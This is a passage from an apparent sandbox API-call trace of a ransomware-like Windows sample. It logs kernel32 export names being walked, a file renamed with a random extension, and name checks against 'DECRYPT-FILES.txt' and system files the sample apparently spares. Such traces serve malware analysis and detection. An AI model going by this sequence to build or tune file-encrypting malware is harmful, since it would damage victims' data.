lpString1=0x36fce30, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0182.358] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0182.358] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0182.358] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0182.358] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0182.358] lstrlenA (lpString="CREATEEVENTW") returned 12 [0182.358] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0182.358] lstrlenA (lpString="CREATEFIBER") returned 11 [0182.358] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0182.358] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0182.358] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0182.358] lstrlenA (lpString="CREATEFILEA") returned 11 [0182.358] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0182.358] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0182.358] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0182.358] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0182.358] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0182.358] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0182.359] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0182.359] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0182.359] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0182.359] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0182.359] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0182.359] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0182.359] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0182.359] lstrlenA (lpString="CREATEFILEW") returned 11 [0182.359] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0182.359] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0182.359] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0182.359] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0182.359] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0182.359] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0182.359] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0182.359] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0182.359] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0182.359] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0182.359] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0182.359] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0182.359] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0182.359] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0182.359] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0182.359] lstrlenA (lpString="CREATEJOBSET") returned 12 [0182.359] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0182.359] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0182.359] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0182.359] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0182.359] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0182.359] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0182.359] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0182.359] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0182.359] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0182.359] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0182.359] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0182.359] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0182.360] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0182.360] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0182.360] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0182.360] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0182.360] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0182.360] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0182.360] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0182.360] lstrlenA (lpString="CREATEPIPE") returned 10 [0182.360] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0182.360] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0182.360] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0182.360] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0182.360] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0182.360] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0182.360] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0182.360] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0182.360] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0182.360] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0182.360] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0182.360] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0182.360] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0182.360] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0182.360] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0182.360] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0182.360] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0182.360] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0182.360] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0182.360] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0182.360] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0182.360] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0182.360] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0182.360] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0182.360] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0182.360] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0182.360] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0182.361] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0182.361] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0182.361] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0182.361] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0182.361] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0182.361] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0182.361] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0182.361] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0182.361] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0182.361] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0182.361] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0182.361] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0182.361] lstrlenA (lpString="CREATETHREAD") returned 12 [0182.361] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0182.361] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0182.361] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0182.361] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0182.361] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0182.361] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0182.361] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0182.361] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0182.361] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0182.361] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0182.361] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0182.361] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0182.361] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0182.361] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0182.361] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0182.361] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0182.361] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0182.361] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0182.361] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0182.361] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0182.361] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0182.361] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0182.362] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0182.362] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0182.362] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0182.362] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0182.362] lstrcpyA (in: lpString1=0x36fce30, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0182.362] lstrlenA (lpString="CTRLROUTINE") returned 11 [0182.362] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0182.362] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0182.362] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0182.362] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0182.362] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0182.362] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0182.362] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0182.362] lstrlenA (lpString="DEBUGBREAK") returned 10 [0182.362] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0182.362] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0182.362] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0182.362] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0182.362] lstrcpyA (in: lpString1=0x36fce30, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0182.362] lstrlenA (lpString="DECODEPOINTER") returned 13 [0182.362] lstrcpyA (in: lpString1=0x36fce30, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0182.362] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0182.362] lstrcpyA (in: lpString1=0x36fce30, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0182.362] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0182.362] lstrcpyA (in: lpString1=0x36fce30, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0182.362] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0182.362] lstrcpyA (in: lpString1=0x36fce30, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0182.362] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0182.362] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0182.362] lstrlenA (lpString="DELETEATOM") returned 10 [0182.362] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0182.362] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0182.362] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0182.362] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0182.362] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0182.362] lstrlenA (lpString="DELETEFIBER") returned 11 [0182.363] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0182.363] lstrlenA (lpString="DELETEFILEA") returned 11 [0182.363] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0182.363] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0182.363] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0182.363] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0182.363] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0182.363] lstrlenA (lpString="DELETEFILEW") returned 11 [0182.363] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0182.363] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0182.363] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0182.363] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0182.363] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0182.363] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0182.363] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0182.363] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0182.363] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0182.363] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0182.363] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0182.363] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0182.363] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0182.363] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0182.363] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0182.363] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0182.363] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0182.363] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0182.363] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0182.363] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0182.363] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0182.363] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0182.363] lstrcpyA (in: lpString1=0x36fce30, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0182.363] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0182.363] lstrcpyA (in: lpString1=0x36fce30, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0182.363] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0182.363] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0182.364] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0182.364] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0182.364] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0182.364] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0182.364] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0182.364] lstrcpyA (in: lpString1=0x36fce30, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0182.364] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0182.364] lstrcpyA (in: lpString1=0x36fce30, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0182.364] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0182.364] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0182.364] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0182.364] lstrcpyA (in: lpString1=0x36fce30, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0182.364] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0182.364] lstrcpyA (in: lpString1=0x36fce30, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0182.364] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0182.364] lstrcpyA (in: lpString1=0x36fce30, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0182.364] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0182.364] lstrcpyA (in: lpString1=0x36fce30, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0182.364] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0182.364] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0182.364] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0182.364] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0182.364] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0182.364] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0182.364] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0182.364] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0182.364] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0182.364] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0182.364] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0182.364] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0182.364] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0182.364] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0182.364] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0182.364] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0182.364] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0182.364] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0182.365] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0182.365] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0182.365] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0182.365] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0182.365] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0182.365] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink.ioFfZl") returned 112 [0182.365] wsprintfW (in: param_1=0x36fdae8, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink.ioFfZl.gVsd2") returned 118 [0182.365] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink.ioFfZl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop (create shortcut).desklink.ioffzl"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink.ioFfZl.gVsd2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop (create shortcut).desklink.ioffzl.gvsd2"), dwFlags=0x0) returned 1 [0182.366] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.366] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.367] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.367] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d97bc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3d828fa3, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x22e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0182.367] lstrcmpiW (lpString1="Desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0182.367] lstrcmpiW (lpString1="Desktop.ini", lpString2="autorun.inf") returned 1 [0182.367] lstrcmpiW (lpString1="Desktop.ini", lpString2="boot.ini") returned 1 [0182.367] lstrcmpiW (lpString1="Desktop.ini", lpString2="desktop.ini") returned 0 [0182.367] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | 